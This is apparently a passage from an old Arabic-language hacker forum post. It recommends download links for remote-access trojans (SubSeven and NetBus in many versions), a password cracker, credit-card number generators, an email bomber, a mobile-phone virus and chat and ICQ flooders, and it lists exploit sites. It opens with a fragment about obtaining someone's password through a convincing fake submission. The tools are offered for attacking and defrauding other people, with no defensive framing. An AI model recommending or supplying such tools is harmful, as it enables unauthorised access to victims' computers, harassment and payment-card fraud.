اذا كانت البيانات التى ارسلتها مقنعه سيرسلون رساله بعد ساعة أو بالكثير 3 ساعات وبها كلمة السر
برامج هاكر انصح بها:-
برنامج للحصول على اى بى من تراسله
http://members.nbci.com/snsr4/ICOwnage-.zip
-------------------------------------------
يحدث اصوات غريبه فى جهاز من تراسله
http://members.nbci.com/snsr4/idb-.zip
--------------------------------------------
يخرج لك اى بى من تراسله
http://members.nbci.com/snsr4/isoaq-.zip
--------------------------------------------
كراك لباسورد سب سفن 1.9
http://portwolf.hack3r.com/zips/subpass.zip
------------------------------------------
جميع اصدارات سب سفن
http://portwolf.hack3r.com/zips/sub710.zip
http://portwolf.hack3r.com/zips/sub71.3.zip
http://portwolf.hack3r.com/zips/sub71.5.zip
http://portwolf.hack3r.com/zips/sub71.7.zip
http://portwolf.hack3r.com/zips/sub71.8.zip
http://portwolf.hack3r.com/zips/sub7server2.zip
http://portwolf.hack3r.com/zips/subseven1.9.zip
http://portwolf.hack3r.com/zips/s7a.zip
http://portwolf.hack3r.com/zips/subseven2.0.zip
http://portwolf.hack3r.com/zips/sub721a.zip
http://portwolf.hack3r.com/zips/sub72.1gold.zip
http://portwolf.hack3r.com/zips/sub7bonus.zip
جميع اصدارات نت بص
http://portwolf.hack3r.com/zips/netbusfirst.zip
http://portwolf.hack3r.com/zips/netbus1.2.zip
http://portwolf.hack3r.com/zips/netbus1.53.zip
http://portwolf.hack3r.com/zips/netbus1.6.zip
http://portwolf.hack3r.com/zips/netbus1.7.zip
http://portwolf.hack3r.com/zips/netbus2.0.zip
http://portwolf.hack3r.com/zips/nbpro201.zip
برامج صنع ارقام الفيزا
http://goldeneyeproject.8k.com/cmaster4.zip
http://goldeneyeproject.8k.com/cardpro.zip
http://www.toxictears.com/files/creditcard/ccmaster.zip
http://goldeneyeproject.8k.com/cprob.zip
http://goldeneyeproject.8k.com/cwizard.zip
http://goldeneyeproject.8k.com/fraud3r.zip
برامج تفجير الايميل
Kaboom 3.0
http://www.smarthack.com/files/kaboom3.zip
برنامج صدام حسين
http://www.gizba.com/x/bahar/sadam.zip
u برنامج اختراق عربى
http://www.geocities.com/eljehad/4u.zip
---------------------------------------------
legion
http://packetstormsecurity.org/groups/rhino9/legion.zip
crm mobile فيروس للجوال
http://www.geocities.com/shad_gad/cmmobile.zip
--------------------------------------------------
change لتغيير امتداد الباتش
http://www.geocities.com/shad_gad/change.zip
--------------------------------------------------
لامطار الجوال بالرسائل icq sms
http://www.geocities.com/shad_gad/IcqSms.zip
فلودرس(وعد الحر دينٌ عليه)
فلودر للشات روم
http://members.nbci.com/snsr4/push2-.zip
-----------------------------------------
فلودر
http://members.nbci.com/snsr4/icqflood95-.zip
-----------------------------------------
فلودر
http://members.nbci.com/snsr4/mouse-.zip
---------------------------------------
مواقع انصح بها:-
http://www.elhacker.net/
http://www.hackermoon.com
Exploits Site
http://www.packetstormsecurity.org
http://www.hack.co.za
http://www.DarkCode.com
http://www.r00tabega.org
http://www.Bugtraq.info
http://www.rootshell.com
http://www.securityfocus.com
http://www.insecure.org
http://get.your.exploits.com
http://www.rootshell.com
http://www.linux.com.cn/hack.co.za
نظرة المجتمع الى الهاكر:-
قالو عن الهاكر:-
** هو الشخص الذي يستمتع بتعلم لغات البرمجة وأنظمة التشغيل الجديدة **